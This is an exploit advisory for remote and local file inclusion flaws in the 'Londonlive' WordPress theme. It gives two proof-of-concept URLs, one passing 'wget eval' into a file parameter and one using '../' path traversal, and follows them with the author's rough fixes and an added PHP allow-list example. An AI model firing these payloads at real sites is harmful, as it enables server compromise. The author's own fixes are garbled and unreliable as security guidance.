
Wordpress themes (Londonlive)====> RFI & LFI

Author: ACe , Published: 19-05-2012
# Exploit Title: Wordpress themes (Londonlive)====> RFI & LFI 
# Google Dork: you do it :P
# Date: 2012/5/31
# Author: ACe
# Version: v1.2
# Tested on: win 7
# email:PGDA@9.cn
# greetings to : pSyCh0_3D , Fontom



#RFI exploit#

http://localhost/wp-content/themes/Londonlive/functions.php?local_file= wget eval





#LFI exploit#


http://localhost/wp-content/themes/Londonlive/scripts/functions/admin_panel_functions.php?page.=../index





#how to fix LFI exploit #

Search for ($page.) and replace it with ('../../..';) in /scripts/functions/admin_panel_functions.php, then save.


#how to fix RFI exploit #

Go to /themes/Londonlive/, open functions.php and define the variable ($local_file) like this:


$local_file="./";
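
Both fixes above work by taking the include path out of the request's control. The block below is an added example, not code from the theme or from the advisory's author, and shows the same idea as an allow-list for when the page still has to be selectable. The theme's source is not shown on this page, so the include pattern, the page names and the "panels" directory are assumptions.

```php
<?php
// Added example, not the theme's code. Assumption: the theme builds an
// include path from request parameters such as `page` and `local_file`.

// Hypothetical allow-list: request value => file inside the panel directory.
const PANEL_PAGES = [
    'general' => 'general.php',
    'layout'  => 'layout.php',
];

/**
 * Map a request-supplied page name to a file that is safe to include.
 * Returns null when the name is not allow-listed or resolves outside $baseDir.
 */
function resolve_panel_page($requested, string $baseDir): ?string
{
    // Only exact allow-list keys pass. Arrays, "../" sequences, absolute
    // paths and URL wrappers (http://, php://) never match a key.
    if (!is_string($requested) || !array_key_exists($requested, PANEL_PAGES)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PANEL_PAGES[$requested]);

    // Defence in depth: the resolved file must exist and sit below $baseDir,
    // which also catches a symlink pointing out of the directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage in the panel script ("panels" is a hypothetical directory name).
$file = resolve_panel_page($_GET['page'] ?? null, __DIR__ . '/panels');
if ($file === null) {
    http_response_code(404);
    exit;
}
include $file;
```

Keeping `allow_url_include = Off` in php.ini (the PHP default) additionally stops `include` from fetching a remote URL if a request value ever reaches it.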





#thanks God for making me stronger :)
